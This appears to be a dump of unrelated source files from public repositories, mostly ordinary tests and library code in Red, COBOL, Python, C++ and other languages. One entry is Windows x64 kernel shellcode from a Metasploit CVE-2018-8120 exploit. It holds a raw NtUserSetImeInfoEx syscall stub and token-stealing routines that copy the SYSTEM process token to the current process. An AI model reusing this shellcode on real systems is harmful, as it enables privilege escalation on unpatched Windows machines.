ci: 1
cia: 2
cia: case [ci = 1 [case [ci <> 0 [3] true [4]]]]
--assert cia = 3
--test-- "case-basic-11"
ci: 1
cia: 2
cia: case [ci = 1 [switch/default ci [1 [3]][4]]]
--assert cia = 3
===end-group===
===start-group=== "case basics local"
case-fun: func [/local ci cia][
--test-- "case-loc-1"
ci: 0
cia: 1
case [true [0]]
--assert cia = 1
--test-- "case-loc-2"
ci: 1
cia: 2
case [ci = 1 [cia: 2]]
--assert cia = 2
--test-- "case-loc-3"
ci: 1
cia: 2
case [true [cia: 3]]
--assert cia = 3
--test-- "case-loc-4"
ci: 0
cia: 2
case [ci <> 0 [cia: 0] true [cia: 3]]
--assert cia = 3
--test-- "case-loc-5"
ci: 99
cia: 2
case [ci = 1 [cia: 2] true [cia: 3]]
--assert cia = 3
--test-- "case-loc-6"
ci: 0
cia: 1
cia: case [true [2]]
--assert cia = 2
--test-- "case-loc-7"
ci: 0
cia: 2
cia: case [ci <> 0 [0] true [3]]
--assert cia = 3
--test-- "case-loc-8"
ci: 1
cia: 2
cia: case [ci = 1 [3]]
--assert cia = 3
--test-- "case-loc-9"
ci: 1
cia: 2
case [ci = 1 [case [ci <> 0 [cia: 3] true [cia: 4]]]]
--assert cia = 3
--test-- "case-loc-10"
ci: 1
cia: 2
cia: case [ci = 1 [case [ci <> 0 [3] true [4]]]]
--assert cia = 3
--test-- "case-loc-11"
ci: 1
cia: 2
cia: case [ci = 1 [switch/default ci [1 [3]][4]]]
--assert cia = 3
]
case-fun
===end-group===
===start-group=== "case integer!"
--test-- "case-int-1"
ci: 1
cia: 0
case [ ci = 1 [cia: 1] ci = 2 [cia: 2] true [cia: 3]]
--assert 1 = cia
--test-- "case-int-2"
ci: 2
cia: 0
case [ ci = 1 [cia: 1] ci = 2 [cia: 2] true [cia: 3]]
--assert 2 = cia
--test-- "case-int-3"
ci: 3
cia: 0
case [ ci = 1 [cia: 1] ci = 2 [cia: 2] true [cia: 3]]
--assert 3 = cia
--test-- "case-int-4"
ci: 9
cia: 0
case [ ci = 1 [cia: 1] ci = 2 [cia: 2] true [cia: 3]]
--assert 3 = cia
--test-- "case-int-5"
ci: 1
--assert 1 = case [ ci = 1 [1] ci = 2 [2] true [3]]
--test-- "case-int-6"
ci: 1
cres: case [ ci = 1 [1] ci = 2 [2] true [3]]
--assert 1 = cres
--test-- "case-int-7"
ci: 2
--assert 2 = case [ ci = 1 [1] ci = 2 [2] true [3]]
--test-- "case-int-8"
ci: 2
cres: case [ ci = 1 [1] ci = 2 [2] true [3]]
--assert 2 = cres
--test-- "case-int-9"
ci: 3
--assert 3 = case [ ci = 1 [1] ci = 2 [2] true [3]]
--test-- "case-int-10"
ci: 3
cres: case [ ci = 1 [1] ci = 2 [2] true [3]]
--assert 3 = cres
--test-- "case-int-11"
ci: 10
--assert 3 = case [ ci = 1 [1] ci = 2 [2] true [3]]
--test-- "case-int-12"
ci: 10
cres: case [ ci = 1 [1] ci = 2 [2] true [3]]
--assert 3 = cres
case [ ci = 1 [cia: 1] ci = 2 [cia: 2] true [cia: 3]]
--test-- "case-int-13"
ci: 1
cia: 0
--assert 1 = case [ ci = 1 [cia: 1] ci = 2 [cia: 2] true [cia: 3]]
--test-- "case-int-14"
ci: 1
cia: 0
cres: case [ ci = 1 [cia: 1] ci = 2 [cia: 2] true [cia: 3]]
--assert 1 = cres
--test-- "case-int-15"
ci: 2
cia: 0
--assert 2 = case [ ci = 1 [cia: 1] ci = 2 [cia: 2] true [cia: 3]]
--test-- "case-int-16"
ci: 2
cia: 0
cres: case [ ci = 1 [cia: 1] ci = 2 [cia: 2] true [cia: 3]]
--assert 2 = cres
--test-- "case-int-17"
ci: 3
cia: 0
--assert 3 = case [ ci = 1 [cia: 1] ci = 2 [cia: 2] true [cia: 3]]
--test-- "case-int-18"
ci: 3
cia: 0
cres: case [ ci = 1 [cia: 1] ci = 2 [cia: 2] true [cia: 3]]
--assert 3 = cres
--test-- "case-int-19"
ci: 9
cia: 0
--assert 3 = case [ ci = 1 [cia: 1] ci = 2 [cia: 2] true [cia: 3]]
--test-- "case-int-20"
ci: 9
cia: 0
cres: case [ ci = 1 [cia: 1] ci = 2 [cia: 2] true [cia: 3]]
--assert 3 = cres
===end-group===
===start-group=== "case logic!"
--test-- "case-logic-1"
cl: true
--assert case [ cl = true [true] cl = false [false] true [false]]
--test-- "case-logic-2"
cl: false
--assert false = case [ cl = true [true] cl = false [false] true [true]]
===end-group===
===start-group=== "case reported issues"
--test-- "case-issue-504"
--assert 1 = case [true 1 false 2]
===end-group===
~~~end-file~~~
| Red | 4 | 0xflotus/red | tests/source/units/case-test.red | [
"BSL-1.0",
"BSD-3-Clause"
] |
public shellcode08
public shellcode7
public shellcode03
public NtUserSetImeInfoEx
_TEXT SEGMENT
NtUserSetImeInfoEx PROC
mov r10,rcx;
mov eax,4871;
syscall;
ret;
NtUserSetImeInfoEx ENDP
shellcode08 PROC
mov rax, gs:[392];// Get nt!_KPCR.PcrbData.CurrentThread
mov rax, [rax + 104];// Get nt!_KTHREAD.ApcState.Process
mov rcx, rax;// Copy current _EPROCESS structure
mov rdx, 4;// WIN 7 SP1 SYSTEM Process PID = 0x4
mov rdi, 232;
SearchSystemPID:
mov rax, [rax + rdi];// Get nt!_EPROCESS.ActiveProcessLinks.Flink
sub rax, rdi;
cmp [rax + 224], rdx;// Get nt!_EPROCESS.UniqueProcessId
jne SearchSystemPID
mov rdx, [rax + 360];// Get SYSTEM process nt!_EPROCESS.Token
mov [rcx + 360], rdx;// Copy nt!_EPROCESS.Token of SYSTEM to current process
xor rax, rax;// Set NTSTATUS SUCCEESS
ret;
shellcode08 ENDP
shellcode7 PROC
mov rax, gs:[392];// Get nt!_KPCR.PcrbData.CurrentThread
mov rax, [rax + 112];// Get nt!_KTHREAD.ApcState.Process
mov rcx, rax;// Copy current _EPROCESS structure
mov rdx, 4;// WIN 7 SP1 SYSTEM Process PID = 0x4
mov rdi, 392;
SearchSystemPID:
mov rax, [rax + rdi];// Get nt!_EPROCESS.ActiveProcessLinks.Flink
sub rax, rdi;
cmp [rax + 384], rdx;// Get nt!_EPROCESS.UniqueProcessId
jne SearchSystemPID
mov rdx, [rax + 520];// Get SYSTEM process nt!_EPROCESS.Token
mov [rcx + 520], rdx;// Copy nt!_EPROCESS.Token of SYSTEM to current process
xor rax, rax;// Set NTSTATUS SUCCEESS
ret;
shellcode7 ENDP
shellcode03 PROC
mov rax, gs:[392];// Get nt!_KPCR.PcrbData.CurrentThread
mov rax, [rax + 104];// Get nt!_KTHREAD.ApcState.Process
mov rcx, rax;// Copy current _EPROCESS structure
mov rdx, 4;// SYSTEM Process PID = 0x4
mov rdi, 224;// Get nt!_EPROCESS.ActiveProcessLinks.Flink
SearchSystemPID:
mov rax, [rax + rdi];
sub rax, rdi;
cmp [rax + 216], rdx;// Get nt!_EPROCESS.UniqueProcessId
jne SearchSystemPID
mov rdx, [rax + 352];// Get SYSTEM process nt!_EPROCESS.Token
mov [rcx + 352], rdx;// Copy nt!_EPROCESS.Token of SYSTEM to current process
xor rax, rax;// Set NTSTATUS SUCCEESS
ret;
shellcode03 ENDP
_TEXT ENDS
END | Assembly | 3 | OsmanDere/metasploit-framework | external/source/exploits/CVE-2018-8120/CVE-2018-8120/shellcode.asm | [
"BSD-2-Clause",
"BSD-3-Clause"
] |
Mozilla/5.0 (Linux; Android 5.0; LG-X170g Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36
Mozilla/5.0 (Linux; Android 5.0; LG-X170g Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Mobile Safari/537.36
| Text | 0 | 5tr1x/SecLists | Fuzzing/User-Agents/operating-platform/lg-x170g.txt | [
"MIT"
] |
t ia2 -dzoom 0 1 400
| AGS Script | 0 | waltersgrey/autoexechack | photofov/NarrowFOV/autoexec.ash | [
"MIT"
] |
#include "caffe2/operators/async_net_barrier_op.h"
namespace caffe2 {
namespace {
std::pair<std::vector<DeviceOption>, std::vector<DeviceOption>>
asyncBarrierOpDevInfer(const OperatorDef& def) {
auto op_device =
def.has_device_option() ? def.device_option() : DeviceOption();
ArgumentHelper helper(def);
auto cross_device = helper.GetSingleArgument<int>("cross_device", 0);
std::vector<DeviceOption> opt;
for (int i = 0; i < def.input().size(); ++i) {
if (cross_device == 1) {
DeviceOption dev;
dev.set_device_type(op_device.device_type());
dev.set_device_id(i);
opt.push_back(dev);
} else {
opt.push_back(op_device);
}
}
return std::make_pair(opt, opt);
}
}
OPERATOR_SCHEMA(AsyncNetBarrier)
.NumInputs(1, INT_MAX)
.NumOutputs(1, INT_MAX)
.IdenticalTypeAndShape()
.InputsCanCrossDevices()
.AllowOneToOneInplace()
.DeviceInferenceFunction(asyncBarrierOpDevInfer)
.SetDoc(R"DOC(
This is a pretty much no-op operator, since it's only purposes is make sure that
async_scheduling will schedule certian operations earlier than others.
Exaple where this operator can work well - mixture of data-parallel and model-
parallel training, where one wants to force that all copies are started before
data-parallel part starts.
)DOC")
.Arg(
"cross_device",
"Specifies either inputs should be across different devices in dev inference options");
SHOULD_NOT_DO_GRADIENT(AsyncNetBarrier);
REGISTER_CPU_OPERATOR(AsyncNetBarrier, AsyncNetBarrierOp<CPUContext>);
} // namespace caffe2
| C++ | 4 | Hacky-DH/pytorch | caffe2/operators/async_net_barrier_op.cc | [
"Intel"
] |
*> This file is part of GnuCOBOL.
*>
*> The GnuCOBOL compiler is free software: you can redistribute
*> it and/or modify it under the terms of the GNU General Public
*> License as published by the Free Software Foundation, either
*> version 3 of the License, or (at your option) any later
*> version.
*>
*> GnuCOBOL is distributed in the hope that it will be useful,
*> but WITHOUT ANY WARRANTY; without even the implied warranty of
*> MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
*> GNU General Public License for more details.
*>
*> You should have received a copy of the GNU General Public
*> License along with GnuCOBOL.
*> If not, see <http://www.gnu.org/licenses/>.
IDENTIFICATION DIVISION.
PROGRAM-ID. prog.
DATA DIVISION.
WORKING-STORAGE SECTION.
01 G-1.
02 X-1 PIC 9(1) VALUE 1
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-2.
02 X-2 PIC 9(2) VALUE 12
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-3.
02 X-3 PIC 9(3) VALUE 123
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-4.
02 X-4 PIC 9(4) VALUE 1234
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-5.
02 X-5 PIC 9(5) VALUE 12345
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-6.
02 X-6 PIC 9(6) VALUE 123456
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-7.
02 X-7 PIC 9(7) VALUE 1234567
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-8.
02 X-8 PIC 9(8) VALUE 12345678
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-9.
02 X-9 PIC 9(9) VALUE 123456789
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-10.
02 X-10 PIC 9(10) VALUE 1234567890
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-11.
02 X-11 PIC 9(11) VALUE 12345678901
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-12.
02 X-12 PIC 9(12) VALUE 123456789012
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-13.
02 X-13 PIC 9(13) VALUE 1234567890123
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-14.
02 X-14 PIC 9(14) VALUE 12345678901234
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-15.
02 X-15 PIC 9(15) VALUE 123456789012345
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-16.
02 X-16 PIC 9(16) VALUE 1234567890123456
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-17.
02 X-17 PIC 9(17) VALUE 12345678901234567
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-18.
02 X-18 PIC 9(18) VALUE 123456789012345678
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-S1.
02 X-S1 PIC S9(1) VALUE -1
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-S2.
02 X-S2 PIC S9(2) VALUE -12
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-S3.
02 X-S3 PIC S9(3) VALUE -123
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-S4.
02 X-S4 PIC S9(4) VALUE -1234
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-S5.
02 X-S5 PIC S9(5) VALUE -12345
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-S6.
02 X-S6 PIC S9(6) VALUE -123456
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-S7.
02 X-S7 PIC S9(7) VALUE -1234567
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-S8.
02 X-S8 PIC S9(8) VALUE -12345678
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-S9.
02 X-S9 PIC S9(9) VALUE -123456789
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-S10.
02 X-S10 PIC S9(10) VALUE -1234567890
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-S11.
02 X-S11 PIC S9(11) VALUE -12345678901
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-S12.
02 X-S12 PIC S9(12) VALUE -123456789012
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-S13.
02 X-S13 PIC S9(13) VALUE -1234567890123
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-S14.
02 X-S14 PIC S9(14) VALUE -12345678901234
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-S15.
02 X-S15 PIC S9(15) VALUE -123456789012345
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-S16.
02 X-S16 PIC S9(16) VALUE -1234567890123456
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-S17.
02 X-S17 PIC S9(17) VALUE -12345678901234567
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
01 G-S18.
02 X-S18 PIC S9(18) VALUE -123456789012345678
@USAGE@.
02 FILLER PIC X(18) VALUE SPACE.
PROCEDURE DIVISION.
*> Dump all values
CALL "dump" USING G-1
END-CALL.
CALL "dump" USING G-2
END-CALL.
CALL "dump" USING G-3
END-CALL.
CALL "dump" USING G-4
END-CALL.
CALL "dump" USING G-5
END-CALL.
CALL "dump" USING G-6
END-CALL.
CALL "dump" USING G-7
END-CALL.
CALL "dump" USING G-8
END-CALL.
CALL "dump" USING G-9
END-CALL.
CALL "dump" USING G-10
END-CALL.
CALL "dump" USING G-11
END-CALL.
CALL "dump" USING G-12
END-CALL.
CALL "dump" USING G-13
END-CALL.
CALL "dump" USING G-14
END-CALL.
CALL "dump" USING G-15
END-CALL.
CALL "dump" USING G-16
END-CALL.
CALL "dump" USING G-17
END-CALL.
CALL "dump" USING G-18
END-CALL.
CALL "dump" USING G-S1
END-CALL.
CALL "dump" USING G-S2
END-CALL.
CALL "dump" USING G-S3
END-CALL.
CALL "dump" USING G-S4
END-CALL.
CALL "dump" USING G-S5
END-CALL.
CALL "dump" USING G-S6
END-CALL.
CALL "dump" USING G-S7
END-CALL.
CALL "dump" USING G-S8
END-CALL.
CALL "dump" USING G-S9
END-CALL.
CALL "dump" USING G-S10
END-CALL.
CALL "dump" USING G-S11
END-CALL.
CALL "dump" USING G-S12
END-CALL.
CALL "dump" USING G-S13
END-CALL.
CALL "dump" USING G-S14
END-CALL.
CALL "dump" USING G-S15
END-CALL.
CALL "dump" USING G-S16
END-CALL.
CALL "dump" USING G-S17
END-CALL.
CALL "dump" USING G-S18
END-CALL.
INITIALIZE X-1.
CALL "dump" USING G-1
END-CALL.
INITIALIZE X-2.
CALL "dump" USING G-2
END-CALL.
INITIALIZE X-3.
CALL "dump" USING G-3
END-CALL.
INITIALIZE X-4.
CALL "dump" USING G-4
END-CALL.
INITIALIZE X-5.
CALL "dump" USING G-5
END-CALL.
INITIALIZE X-6.
CALL "dump" USING G-6
END-CALL.
INITIALIZE X-7.
CALL "dump" USING G-7
END-CALL.
INITIALIZE X-8.
CALL "dump" USING G-8
END-CALL.
INITIALIZE X-9.
CALL "dump" USING G-9
END-CALL.
INITIALIZE X-10.
CALL "dump" USING G-10
END-CALL.
INITIALIZE X-11.
CALL "dump" USING G-11
END-CALL.
INITIALIZE X-12.
CALL "dump" USING G-12
END-CALL.
INITIALIZE X-13.
CALL "dump" USING G-13
END-CALL.
INITIALIZE X-14.
CALL "dump" USING G-14
END-CALL.
INITIALIZE X-15.
CALL "dump" USING G-15
END-CALL.
INITIALIZE X-16.
CALL "dump" USING G-16
END-CALL.
INITIALIZE X-17.
CALL "dump" USING G-17
END-CALL.
INITIALIZE X-18.
CALL "dump" USING G-18
END-CALL.
INITIALIZE X-S1.
CALL "dump" USING G-S1
END-CALL.
INITIALIZE X-S2.
CALL "dump" USING G-S2
END-CALL.
INITIALIZE X-S3.
CALL "dump" USING G-S3
END-CALL.
INITIALIZE X-S4.
CALL "dump" USING G-S4
END-CALL.
INITIALIZE X-S5.
CALL "dump" USING G-S5
END-CALL.
INITIALIZE X-S6.
CALL "dump" USING G-S6
END-CALL.
INITIALIZE X-S7.
CALL "dump" USING G-S7
END-CALL.
INITIALIZE X-S8.
CALL "dump" USING G-S8
END-CALL.
INITIALIZE X-S9.
CALL "dump" USING G-S9
END-CALL.
INITIALIZE X-S10.
CALL "dump" USING G-S10
END-CALL.
INITIALIZE X-S11.
CALL "dump" USING G-S11
END-CALL.
INITIALIZE X-S12.
CALL "dump" USING G-S12
END-CALL.
INITIALIZE X-S13.
CALL "dump" USING G-S13
END-CALL.
INITIALIZE X-S14.
CALL "dump" USING G-S14
END-CALL.
INITIALIZE X-S15.
CALL "dump" USING G-S15
END-CALL.
INITIALIZE X-S16.
CALL "dump" USING G-S16
END-CALL.
INITIALIZE X-S17.
CALL "dump" USING G-S17
END-CALL.
INITIALIZE X-S18.
CALL "dump" USING G-S18
END-CALL.
MOVE ZERO TO X-1.
CALL "dump" USING G-1
END-CALL.
MOVE ZERO TO X-2.
CALL "dump" USING G-2
END-CALL.
MOVE ZERO TO X-3.
CALL "dump" USING G-3
END-CALL.
MOVE ZERO TO X-4.
CALL "dump" USING G-4
END-CALL.
MOVE ZERO TO X-5.
CALL "dump" USING G-5
END-CALL.
MOVE ZERO TO X-6.
CALL "dump" USING G-6
END-CALL.
MOVE ZERO TO X-7.
CALL "dump" USING G-7
END-CALL.
MOVE ZERO TO X-8.
CALL "dump" USING G-8
END-CALL.
MOVE ZERO TO X-9.
CALL "dump" USING G-9
END-CALL.
MOVE ZERO TO X-10.
CALL "dump" USING G-10
END-CALL.
MOVE ZERO TO X-11.
CALL "dump" USING G-11
END-CALL.
MOVE ZERO TO X-12.
CALL "dump" USING G-12
END-CALL.
MOVE ZERO TO X-13.
CALL "dump" USING G-13
END-CALL.
MOVE ZERO TO X-14.
CALL "dump" USING G-14
END-CALL.
MOVE ZERO TO X-15.
CALL "dump" USING G-15
END-CALL.
MOVE ZERO TO X-16.
CALL "dump" USING G-16
END-CALL.
MOVE ZERO TO X-17.
CALL "dump" USING G-17
END-CALL.
MOVE ZERO TO X-18.
CALL "dump" USING G-18
END-CALL.
MOVE ZERO TO X-S1.
CALL "dump" USING G-S1
END-CALL.
MOVE ZERO TO X-S2.
CALL "dump" USING G-S2
END-CALL.
MOVE ZERO TO X-S3.
CALL "dump" USING G-S3
END-CALL.
MOVE ZERO TO X-S4.
CALL "dump" USING G-S4
END-CALL.
MOVE ZERO TO X-S5.
CALL "dump" USING G-S5
END-CALL.
MOVE ZERO TO X-S6.
CALL "dump" USING G-S6
END-CALL.
MOVE ZERO TO X-S7.
CALL "dump" USING G-S7
END-CALL.
MOVE ZERO TO X-S8.
CALL "dump" USING G-S8
END-CALL.
MOVE ZERO TO X-S9.
CALL "dump" USING G-S9
END-CALL.
MOVE ZERO TO X-S10.
CALL "dump" USING G-S10
END-CALL.
MOVE ZERO TO X-S11.
CALL "dump" USING G-S11
END-CALL.
MOVE ZERO TO X-S12.
CALL "dump" USING G-S12
END-CALL.
MOVE ZERO TO X-S13.
CALL "dump" USING G-S13
END-CALL.
MOVE ZERO TO X-S14.
CALL "dump" USING G-S14
END-CALL.
MOVE ZERO TO X-S15.
CALL "dump" USING G-S15
END-CALL.
MOVE ZERO TO X-S16.
CALL "dump" USING G-S16
END-CALL.
MOVE ZERO TO X-S17.
CALL "dump" USING G-S17
END-CALL.
MOVE ZERO TO X-S18.
CALL "dump" USING G-S18
END-CALL.
STOP RUN.
| COBOL | 3 | 6un9-h0-Dan/cobaul | deps/gnucobol-2.2/tests/testsuite.src/numeric-dump.cob | [
"MIT"
] |
pub main
coginit(0, @entry, 0)
dat
org 0
entry
_toReal
mov arg02, imm_1199570944_
call #__system___float_mul
mov arg01, result1
mov arg02, #0
call #__system___float_tointeger
_toReal_ret
ret
__system___float_tointeger
mov __system___float_tointeger_r, arg02
mov __system___float_Unpack_s, arg01
shr __system___float_Unpack_s, #31
mov __system___float_Unpack_x, arg01
shl __system___float_Unpack_x, #1
shr __system___float_Unpack_x, #24 wz
and arg01, imm_8388607_
if_ne shl arg01, #6
if_ne or arg01, imm_536870912_
if_ne jmp #LR__0002
mov _tmp002_, arg01
mov _tmp001_, #32
LR__0001
shl _tmp002_, #1 wc
if_nc djnz _tmp001_, #LR__0001
sub _tmp001_, #23
mov __system___float_Unpack_x, _tmp001_
mov __system___float_Unpack__cse__0006, #7
sub __system___float_Unpack__cse__0006, _tmp001_
shl arg01, __system___float_Unpack__cse__0006
LR__0002
sub __system___float_Unpack_x, #127
mov result3, arg01
mov result2, __system___float_Unpack_x
mov __system___float_tointeger_x, result2
mov __system___float_tointeger_m, result3
cmps __system___float_tointeger_x, imm_4294967295_ wc,wz
if_b jmp #LR__0003
cmps __system___float_tointeger_x, #30 wc,wz
if_a jmp #LR__0003
shl __system___float_tointeger_m, #2
mov __system___float_tointeger__cse__0001, #30
sub __system___float_tointeger__cse__0001, __system___float_tointeger_x
shr __system___float_tointeger_m, __system___float_tointeger__cse__0001
add __system___float_tointeger_m, __system___float_tointeger_r
shr __system___float_tointeger_m, #1
cmp __system___float_Unpack_s, #0 wz
if_ne neg __system___float_tointeger_m, __system___float_tointeger_m
mov result1, __system___float_tointeger_m
jmp #__system___float_tointeger_ret
LR__0003
mov result1, #0
__system___float_tointeger_ret
ret
imm_1199570944_
long 1199570944
imm_4294967295_
long -1
imm_536870912_
long 536870912
imm_8388607_
long 8388607
result1
long 0
result2
long 0
result3
long 0
COG_BSS_START
fit 496
org COG_BSS_START
__system___float_Unpack__cse__0006
res 1
__system___float_Unpack_s
res 1
__system___float_Unpack_x
res 1
__system___float_tointeger__cse__0001
res 1
__system___float_tointeger_m
res 1
__system___float_tointeger_r
res 1
__system___float_tointeger_x
res 1
_tmp001_
res 1
_tmp002_
res 1
arg01
res 1
arg02
res 1
fit 496
| Parrot Assembly | 2 | archivest/spin2cpp | Test/Expect/stest247.pasm | [
"MIT"
] |
component{
public void function onRequest(required string targetPage) {
include arguments.targetPage;
return;
}
} | ColdFusion CFC | 1 | tonym128/CFLint | src/test/resources/com/cflint/tests/Parsing/include_96.cfc | [
"BSD-3-Clause"
] |
"""
Module for formatting output data in console (to string).
"""
from __future__ import annotations
from shutil import get_terminal_size
from typing import Iterable
import numpy as np
from pandas.io.formats.format import DataFrameFormatter
from pandas.io.formats.printing import pprint_thing
class StringFormatter:
"""Formatter for string representation of a dataframe."""
def __init__(self, fmt: DataFrameFormatter, line_width: int | None = None):
self.fmt = fmt
self.adj = fmt.adj
self.frame = fmt.frame
self.line_width = line_width
def to_string(self) -> str:
text = self._get_string_representation()
if self.fmt.should_show_dimensions:
text = "".join([text, self.fmt.dimensions_info])
return text
def _get_strcols(self) -> list[list[str]]:
strcols = self.fmt.get_strcols()
if self.fmt.is_truncated:
strcols = self._insert_dot_separators(strcols)
return strcols
def _get_string_representation(self) -> str:
if self.fmt.frame.empty:
return self._empty_info_line
strcols = self._get_strcols()
if self.line_width is None:
# no need to wrap around just print the whole frame
return self.adj.adjoin(1, *strcols)
if self._need_to_wrap_around:
return self._join_multiline(strcols)
return self._fit_strcols_to_terminal_width(strcols)
@property
def _empty_info_line(self) -> str:
return (
f"Empty {type(self.frame).__name__}\n"
f"Columns: {pprint_thing(self.frame.columns)}\n"
f"Index: {pprint_thing(self.frame.index)}"
)
@property
def _need_to_wrap_around(self) -> bool:
return bool(self.fmt.max_cols is None or self.fmt.max_cols > 0)
def _insert_dot_separators(self, strcols: list[list[str]]) -> list[list[str]]:
str_index = self.fmt._get_formatted_index(self.fmt.tr_frame)
index_length = len(str_index)
if self.fmt.is_truncated_horizontally:
strcols = self._insert_dot_separator_horizontal(strcols, index_length)
if self.fmt.is_truncated_vertically:
strcols = self._insert_dot_separator_vertical(strcols, index_length)
return strcols
@property
def _adjusted_tr_col_num(self) -> int:
return self.fmt.tr_col_num + 1 if self.fmt.index else self.fmt.tr_col_num
def _insert_dot_separator_horizontal(
self, strcols: list[list[str]], index_length: int
) -> list[list[str]]:
strcols.insert(self._adjusted_tr_col_num, [" ..."] * index_length)
return strcols
def _insert_dot_separator_vertical(
self, strcols: list[list[str]], index_length: int
) -> list[list[str]]:
n_header_rows = index_length - len(self.fmt.tr_frame)
row_num = self.fmt.tr_row_num
for ix, col in enumerate(strcols):
cwidth = self.adj.len(col[row_num])
if self.fmt.is_truncated_horizontally:
is_dot_col = ix == self._adjusted_tr_col_num
else:
is_dot_col = False
if cwidth > 3 or is_dot_col:
dots = "..."
else:
dots = ".."
if ix == 0 and self.fmt.index:
dot_mode = "left"
elif is_dot_col:
cwidth = 4
dot_mode = "right"
else:
dot_mode = "right"
dot_str = self.adj.justify([dots], cwidth, mode=dot_mode)[0]
col.insert(row_num + n_header_rows, dot_str)
return strcols
def _join_multiline(self, strcols_input: Iterable[list[str]]) -> str:
lwidth = self.line_width
adjoin_width = 1
strcols = list(strcols_input)
if self.fmt.index:
idx = strcols.pop(0)
lwidth -= np.array([self.adj.len(x) for x in idx]).max() + adjoin_width
col_widths = [
np.array([self.adj.len(x) for x in col]).max() if len(col) > 0 else 0
for col in strcols
]
assert lwidth is not None
col_bins = _binify(col_widths, lwidth)
nbins = len(col_bins)
if self.fmt.is_truncated_vertically:
assert self.fmt.max_rows_fitted is not None
nrows = self.fmt.max_rows_fitted + 1
else:
nrows = len(self.frame)
str_lst = []
start = 0
for i, end in enumerate(col_bins):
row = strcols[start:end]
if self.fmt.index:
row.insert(0, idx)
if nbins > 1:
if end <= len(strcols) and i < nbins - 1:
row.append([" \\"] + [" "] * (nrows - 1))
else:
row.append([" "] * nrows)
str_lst.append(self.adj.adjoin(adjoin_width, *row))
start = end
return "\n\n".join(str_lst)
def _fit_strcols_to_terminal_width(self, strcols: list[list[str]]) -> str:
from pandas import Series
lines = self.adj.adjoin(1, *strcols).split("\n")
max_len = Series(lines).str.len().max()
# plus truncate dot col
width, _ = get_terminal_size()
dif = max_len - width
# '+ 1' to avoid too wide repr (GH PR #17023)
adj_dif = dif + 1
col_lens = Series([Series(ele).apply(len).max() for ele in strcols])
n_cols = len(col_lens)
counter = 0
while adj_dif > 0 and n_cols > 1:
counter += 1
mid = round(n_cols / 2)
mid_ix = col_lens.index[mid]
col_len = col_lens[mid_ix]
# adjoin adds one
adj_dif -= col_len + 1
col_lens = col_lens.drop(mid_ix)
n_cols = len(col_lens)
# subtract index column
max_cols_fitted = n_cols - self.fmt.index
# GH-21180. Ensure that we print at least two.
max_cols_fitted = max(max_cols_fitted, 2)
self.fmt.max_cols_fitted = max_cols_fitted
# Call again _truncate to cut frame appropriately
# and then generate string representation
self.fmt.truncate()
strcols = self._get_strcols()
return self.adj.adjoin(1, *strcols)
def _binify(cols: list[int], line_width: int) -> list[int]:
adjoin_width = 1
bins = []
curr_width = 0
i_last_column = len(cols) - 1
for i, w in enumerate(cols):
w_adjoined = w + adjoin_width
curr_width += w_adjoined
if i_last_column == i:
wrap = curr_width + 1 > line_width and i > 0
else:
wrap = curr_width + 2 > line_width and i > 0
if wrap:
bins.append(i)
curr_width = w_adjoined
bins.append(len(cols))
return bins
| Python | 5 | 13rianlucero/CrabAgePrediction | crabageprediction/venv/Lib/site-packages/pandas/io/formats/string.py | [
"MIT"
] |
#include "EXTERN.h"
#include "perl.h"
#include "XSUB.h"
/* for Perl prior to v5.7.1 */
#ifndef SvUOK
# define SvUOK(sv) SvIOK_UV(sv)
#endif
double XS_BASE = 0;
double XS_BASE_LEN = 0;
MODULE = Math::BigInt::FastCalc PACKAGE = Math::BigInt::FastCalc
PROTOTYPES: DISABLE
#############################################################################
# 2002-08-12 0.03 Tels unreleased
# * is_zero/is_one/is_odd/is_even/len work now (pass v1.61 tests)
# 2002-08-13 0.04 Tels unreleased
# * returns no/yes for is_foo() methods to be faster
# 2002-08-18 0.06alpha
# * added _num(), _inc() and _dec()
# 2002-08-25 0.06 Tels
# * added __strip_zeros(), _copy()
# 2004-08-13 0.07 Tels
# * added _is_two(), _is_ten(), _ten()
# 2007-04-02 0.08 Tels
# * plug leaks by creating mortals
# 2007-05-27 0.09 Tels
# * add _new()
#define RETURN_MORTAL_INT(value) \
